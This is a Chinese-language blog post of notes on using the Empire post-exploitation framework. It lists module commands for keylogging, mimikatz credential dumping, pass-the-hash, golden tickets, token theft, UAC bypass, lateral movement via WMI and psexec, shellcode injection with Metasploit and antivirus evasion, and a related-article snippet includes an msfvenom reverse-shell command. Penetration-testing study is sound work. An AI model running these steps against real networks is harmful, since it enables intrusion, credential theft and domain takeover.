Empire
Empire 内网渗透神器
一 基本渗透
安装
git clone https://github.com/BC-SECURITY/Empire/
./setup/install.sh
启动
./empire

目前加载的模块 285
监听器
当前活动代理 可以理解当前会话
lisenter 进入监听器模块
uselistener + tab键可以查看有多少个监听器 然后就可以选项
info 查看描述 查看哪些是必须要设置的选项
set + name + what 将name设置为what
在设置host的时候需要加上端口号
execute 开始执行
list 查看有多少个监听器
kill 删除监听器
usestager 设置payload
sysinfo 查看系统信息
help agents 查看简单的终端命令
sc 截图命令
interact 选择当前的一个会话
模块命令
sc截图命令
searchmodule 搜索模块
usemodule 使用模块
code_execution代码执行
collection收集浏览器、剪切板、keepass、文件浏览记录等信息
credentials密码凭据的获取和转储
exfiltration信息渗出
exploitation漏洞溢出
lateral_movement横向运动移动
management用来执行些系统设置,和邮件信息的收集
persistence权限维持
privesc本机权限提升
recon侦察
situational_awareness评估主机运行环境,网络运行环境
trollsploit恶作剧
使用键盘记录模块
usemodule collection/keylogger
剪切板
collection/clipboard_monitor
二、常用模块的使用
1.主机发现
rename 重命名
sysinfo 查看系统信息
使用模块
usemode situational_awareness/network/
这里有多个扫描的模块可以使用
smb扫描
network/smbscanner 需要登陆的账号和密码
2.端口扫描
usemodule situational_awareness/network/portscan
设置各个参数即可
3.查找本地管理员的主机**
situational_awareness/network/powerview/find_localadmin_access
直接执行
4. 查看共享文件
situational_awareness/network/powerview/share_finder
- 本地信息收集*
situational_awareness/host/winenum
6. 提权
bypassuac
privesc/bypassuac
扫描环境向量提权 privesc/powerup/allchecks
计划任务system提权
persistence/elevated/schtasks
set Listener test
用户名的名字必须是存在的 设置dailytime
溢出提权漏洞
powershell/privesc/ms16-032
powershell/privesc/ms16-135
三、域内渗透
shell whoami /groups 查看权限
用基本的命令查询本地的信息
sysinfo
whoami
info
arp扫描
situational_awareness/network/arpscan
查找本地管理员
situational_awareness/network/powerview/find_localadmin_access
moonsec这个用户是否是域内某一台主机的本地管理员
查看内网的主机,查找那台机器是本地管理员,进行本地的端口和arp扫描,查询内网的受信任关系
确定是否能访问 database2的c盘

查找域控
situational_awareness/network/powerview/get_domain_controller

会话注入
lateral_movement/invoke_wmi
lateral_movement/invoke_psexec
通过invoke_wmi 或者 psexe模块 拿到database2的权限
lateral_movement/invoke_wmi
设置好监听器和计算机名用execute执行

invoke_wmi 系统自带
psexec 留下记录
lateral_movement/invoke_psexec
获取系统权限
命令token窃取
窃取之后就有dc的访问权限
ps 查询进程是否有域内超级管理员
恢复原来身份可以用
revtoself
凭证获取
mimikatz
当前的权限为1 我们就可以用mimikatz 这个命令 获取明文 还有用户的一些凭证。
我们获取之后可以用一个creds命令 查询用户凭证信息
将获取到的凭证信息保存到一个文件中
三种方法继续进行权限的提升(基于凭证信息的获取)
1.usemodule use lateral_movement/invoke_wmi
填写的数据
Listener
Credid creds中的id
ComputerName 电脑的名字

制作pth
pth + 获取·到的clientid 就可以制作假身份了哈哈。
制作黄金
credentials/mimikatz/lsadump 获取到krtbtgt 哈希
credentials/mimikatz/golden_ticket
set credid 4
set user Administrator
execute
四、会话管理
重启之后,所有的会话都会被清理掉
spawn 进行派生会话
psinject 注入进程
psinject 进程号 监听器
和meatsploit进行联动
使用code_execution/invoke_shellcode
这个模块 Lhost设置metasploit的ip地址 lport 设置的端口
payloady 跟metasploit 相对应。
五、过免杀
usestager windows/csharp_exe

踩坑记录:
git clone https://github.com/EmpireProject/Empire.git
cd Empire
cd setup
sudo ./install.sh
然后开始报错
NomodulenamedCrypto.Cipher
pip install Crypto
pip install pycryptodome
#报错1:ImportError: No module named M2Crypto
root@kali:~/Empire/setup# pip install https://gitlab.com/m2crypto/m2crypto/-/archive/master/m2crypto-master.tar.gz
root@kali:~/Empire/setup# ./reset.sh
#报错2:ImportError: No module named xlrd
root@kali:~/Empire/setup# pip install xlrd
root@kali:~/Empire/setup# ./reset.sh
#报错3:ImportError: No module named xlutils.copy
root@kali:~/Empire/setup# pip install xlutils
root@kali:~/Empire/setup# ./reset.sh
#报错4:ImportError: No module named pyminifier
root@kali:~/Empire/setup# pip install pyminifier
root@kali:~/Empire/setup# ./reset.sh
复制代码
然后就是换源
Empire的更多相关文章
- 渗透之Empire
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! Empire是一个纯碎的PowerShell后期漏洞利用代理工具,它建立在密码学.安全通信和灵活的架构之上.Empire实 ...
- PowerShell Empire使用笔记
##安装过程 git clone https://github.com/EmpireProject/Empire.git cd Empire cd setup sudo ./install.sh ## ...
- 后渗透神器Empire的简单使用
1.安装 1.1.系统环境: Debian系Linux:例如Ubuntu和Kali(本文使用Kali作为环境) 1.2.安装命令: 安装最后需要输入用户名.密码 wget https://raw.gi ...
- 嘻哈帝国第一季/全集Empire迅雷下载
英文译名Empire,第1季(2015-01-08)FOX.本季看点:<嘻哈帝国>卢西奥斯·莱恩是一名超级音乐明星兼Empire娱乐公司的创始人,故事讲述了他如何在困境和失败中运营公司的故 ...
- Empire安装和试用
Empire2.0,powershell后渗透利器的安装和试用 https://www.restkhz.com/2017/05/empire-test/ 使用Empire“探索”Windows个人电脑 ...
- 使用Empire自动获取域管理员
使用Empire自动获取域管理员 译:backlion 前言 自从Empire和BloodHound被应用来,对AD渗透已经可以获取到内网环境95%的信息量.作者发现自己一遍又一遍地在做同样重复的事 ...
- Empire – PowerShell 后渗透攻击框架
0x01 简介 Empire是一个后开发框架.它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能.Empire具有在不需要PowerShell.exe的情况下执行PowerS ...
- cobalt strike笔记-CS与MSF,Armitage,Empire互转shell
0x01 Metasploit派生shell给Cobaltstrike 生成木马: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata ...
- 无 PowerShell.exe 执行 Empire 的几种姿势
在实战中,Empire成为域渗透.后渗透阶段一大利器,而Empire是一个Powershell RAT,所以PowerShell必须要能运行Empire中几乎所有的启动方法都依赖于使用PowerShe ...
- 初识域渗透利器Empire
Empire 是一款类似Metasploit 的渗透测试框架,基于python 编写,Empire是一个纯粹的PowerShell 后开发代理,建立在密码安全通信和灵活的架构上.Empire 实现了无 ...
随机推荐
- 【JAVA基础】static的定义
public class STATIC { public static void main(String[] args) { // 创建两个不同的类 只要赋值一个 另外一个定义好的static属性 会 ...
- spring boot 项目使用idea正常打包后执行总是出现异常,解决办法
众所周知,spring boot 在构建项目时,确实为Java程序员们省了不少力气,打包项目非常容易. 上周在项目中遇到打包后的项目总是无法运行,困扰了我们团队将近两天才找到原因. 图和真相在这里.
- css 06-CSS盒模型详解
06-CSS盒模型详解 #盒子模型 #前言 盒子模型,英文即box model.无论是div.span.还是a都是盒子. 但是,图片.表单元素一律看作是文本,它们并不是盒子.这个很好理解,比如说,一张 ...
- PHP MySQL 快速导入10万条数据
项目背景 数据来源:所有数据均为外部导入,最大数据量在10w+ 输出数据:导出经过业务处理之后的数据 使用框架:fastadmin 涉及的问题: 1.数据读取 2.数据保存 使用数据:10w+ 解决方 ...
- <未解决的问题>crontab 定时弹框任务
问题:crontab写别的定时脚本就可以执行(比如说每隔一分钟就创建一个txt文件),但是写shell就不知道为什么,反弹不了 但是开启Linux终端窗口单独执行bash shell时候,(不通过re ...
- Synchronized用法原理和锁优化升级过程(面试)
简介 多线程一直是面试中的重点和难点,无论你现在处于啥级别段位,对synchronized关键字的学习避免不了,这是我的心得体会.下面咱们以面试的思维来对synchronized做一个系统的描述,如果 ...
- k8s之深入解剖Pod(二)
目录: Pod配置管理:ConfigMap 容器内获取Pod信息:Downward API Pod生命周期和重启策略 Pod健康检查 一.ConfigMap 将应用所需的配置信息与程序进行分离,可以使 ...
- 爬取并分析一下B站的最热视频排行榜,看看大家都喜欢看什么视频
前言 现在大家的生活中,已经越来越离不开B站了,2020年的第一季度,B站月活跃用户达到了1.72亿,日活跃用户也已经突破了5000万个用户.源源不断的流量让B站的up主们也是粉丝数目不断暴涨,百万粉 ...
- 2020年的UWP(5)——UWP和Desktop Extension的双向交互
上一篇我们提到了怎么在Desktop Extension中等待并处理UWP端发出的request.在本篇中将描述UWP和Desktop Extension双向交互的场景,即存在从两端各自发出reque ...
- rocketMq broker.conf全部参数解释
#4.7.1版本 #所属集群名字brokerClusterName=rocketmq-cluster#broker名字,名字可重复,为了管理,每个master起一个名字,他的slave同他,eg:Am ...